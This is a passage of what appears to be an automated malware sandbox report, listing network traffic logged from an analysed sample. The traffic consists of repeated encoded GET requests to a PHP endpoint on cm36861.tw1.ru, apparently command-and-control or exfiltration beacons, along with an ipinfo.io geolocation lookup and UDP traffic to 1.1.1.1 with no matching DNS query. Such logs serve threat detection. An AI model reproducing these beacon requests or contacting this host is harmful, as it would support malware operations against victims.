1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ&3b482a1504ac77c5c43f7e15a2187b43=9f54798b89eb404995a9b7978336a5b8&c3f24358aa290547facbfb1d35d51e12=gN5QDZjZzMmJGZ0Y2NjFTZihjMxcTYmNTNkRDO4IWZlRGOwE2YyIDO&Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&4f95757b0d5ea400a0cf47cfe251d048=0VfiIiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&c53e3657c2ea67a0f680c4bd0f941e0a=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
